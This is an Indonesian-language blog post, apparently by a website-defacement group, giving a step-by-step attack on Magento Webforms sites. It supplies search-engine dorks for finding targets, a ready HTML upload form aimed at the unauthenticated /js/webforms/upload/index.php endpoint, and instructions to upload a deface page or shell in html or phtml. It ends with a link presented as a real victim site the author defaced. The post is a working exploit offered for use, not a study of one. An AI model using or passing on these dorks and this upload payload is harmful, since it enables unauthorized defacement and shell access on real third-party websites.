Deface Menggunakan Magento Webforms File

Deface Menggunakan Magento Webforms File


label
label
Selamat Sore kawan ketemu lagi dengan w admin gans B)
Quotes By Mr.Acid Poison
langsung saja ah no basa basi

Dork :
- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop
CSRF :
<form method="POST" action="https://site/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Web Vuln ditandai dengan "[]"
*Tanpa tanda petik

Eksploit : 
site.com/path//js/webforms/upload/index.php 
 Langkah-langkah :
  • Seperti biasa kita cari web dengan memasukan dork kebrowser
  • Lalu kita masukan eksploitnya 
  •  Lalu kita masukan site tersebut ke CSRF
  • Kemudian kita buka csrf tersebut
  • Lalu upload sc deface/shell kita
Nb : file nya harus berekstensi html/phtml
  • Nanti akan muncul huruf random
 
  • Tinggal buka deh akses nya 
site.com/js/webforms/upload/files/[angka random]/namafile.html
Hasil pnya w
https://www.w6-naehmaschinen.de/js/webforms/upload/files/mqe5e/team.html
Sekian dan terimakasih sampai jumpa di artikel selanjutnya ya :*

Mr.Acid Poison
Thanks to
  1. All member Cyrus Cyber 
  2. Cowokerensteam (inspirasi artikel ini)
Share This :
Admin

comment 0 comments:

more_vert

*Komentar Dengan Sopan !
*Jangan OOT ^_^

sentiment_satisfied Emoticon